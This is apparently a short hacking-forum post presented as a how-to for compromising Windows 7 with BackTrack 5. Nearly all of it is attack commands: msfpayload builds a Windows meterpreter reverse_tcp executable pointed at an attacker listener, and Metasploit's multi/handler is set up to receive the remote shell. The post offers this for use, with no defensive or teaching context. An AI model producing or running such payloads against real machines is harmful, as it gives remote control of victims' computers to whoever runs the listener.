13 Years of Service
77%
This link is hidden for visitors. Please Log in or register now.
Heeey HF this is how to exploit windows 7 using BackTrack 5
Command's Used :
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 x > /root/exploit.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.1
exploit